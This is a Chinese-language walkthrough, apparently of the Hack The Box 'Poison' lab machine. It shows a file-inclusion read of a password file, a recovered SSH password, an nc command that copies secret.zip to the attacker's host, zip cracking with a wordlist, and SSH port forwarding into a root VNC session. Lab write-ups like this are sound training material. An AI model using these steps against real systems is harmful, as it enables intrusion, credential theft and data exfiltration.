本文详细介绍了在HacktheBox平台中Poison靶机的解题过程,涉及信息搜集、端口转发及Xvnc密码破解。通过nmap扫描发现80端口,利用文件包含漏洞找到用户名和密码文件。借助Burp Suite抓包,解密获取SSH信息,并通过nc拷贝secret.zip文件。最终,利用VNC的端口转发和密码猜测,成功以root权限进入远程桌面。
nmap
常规端口,看到22想到是否有ssh密码连进去,80进去搜集信息
一开始我还以为直接考上传呢,
根据提示,输入几个看看,发现是file=这种格式,一般都有文件包含漏洞
试试看。知道了用户名charix,因为是带bash或csh的
重点是listfiles.php,看到第8个是密码文件
用burp顺便抓一下,或者http://10.10.10.84/pwdbackup.txt
一看这种带=号的就是base它说加密了13次。。。那就一个一个来
我习惯用这个网站
最后结果Charix!2#4%6&8(0
好了,ssh信息都知道了。登录。成功ssh charix@10.10.10.84
看到home有serect.zip文件。用nc拷过来nc 10.10.14.15 4444 < secret.zip,本机 nc -nlvp 4444 > s.zip再解密
fcrackzip 666.zip -u -D -p /usr/share/wordlists/rockyou.txt
但是始终解不开,这种时候可能会一条道路到黑,换更多密码的字典去刚他破解。但也可以,不用想那么多复杂,去往简单方面想,比如用刚ssh的密码、、或其他弱智密码,反而有效。。。
经验证是刚才ssh的密码。
但是打开是乱码。。。还得寻找突破点。
老套路,上linpeash.sh
看到root运行的进程有xvnc,这或许是突破口,这是远程桌面控制程序,如果能突破的话,我可以以root身份进入远程桌面?
vnc默认端口是5901,但是端口不一定是一成不变的。于是我查下靶机端口情况
sockstat -4 -l
果然5901,但是只运行locally,所以之前我们nmap扫不到
这个时候用端口转发,转到我们本机,在本机输入
service ssh start
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84 -N
ok再开始从本机里运行vnc程序,但提示要密码,鬼知道。
会不会是之前的那个奇葩secret.zip里的密码?如果不是,那我也猜不出来了。。
试试
vncviewer 127.0.0.1::5901 -passwd /root/htb/poison/secret
果然是的,成功登陆。
扫一扫
308
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
